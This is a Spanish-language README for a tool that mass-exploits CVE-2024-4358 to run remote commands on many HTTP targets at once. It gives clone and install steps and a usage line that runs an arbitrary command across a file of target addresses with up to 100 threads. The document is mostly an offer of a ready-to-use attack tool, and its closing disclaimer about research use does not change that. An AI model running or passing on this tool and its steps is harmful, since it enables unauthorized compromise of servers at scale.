
Herramienta de explotación masiva para CVE-2024-4358 que permite la ejecución remota de comandos en múltiples objetivos HTTP con escaneo de múltiples hilos y entrega de payload.
Herramientas modificadas de @sinsinology para realizar explotación masiva.

git clone https://github.com/Sk1dr0wz/CVE-2024-4358_Mass_Exploit.git
cd CVE-2024-4358_Mass_Exploit
pip intstall -r requirements.txt
usage: python CVE-2024-4358.py --target-file targets.txt -c "whoami > C:\pwned.txt" --threads 10
options:
-h, --help show this help message and exit
--target-file TARGET_FILE, -tf TARGET_FILE
File containing target IPs and ports (one per line, e.g: http://192.168.1.1:83)
--command COMMAND, -c COMMAND
Command to execute
--threads THREADS, -th THREADS
Number of threads to use (max: 100)
Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables ni se hacen cargo del uso indebido del software. Úselo con responsabilidad.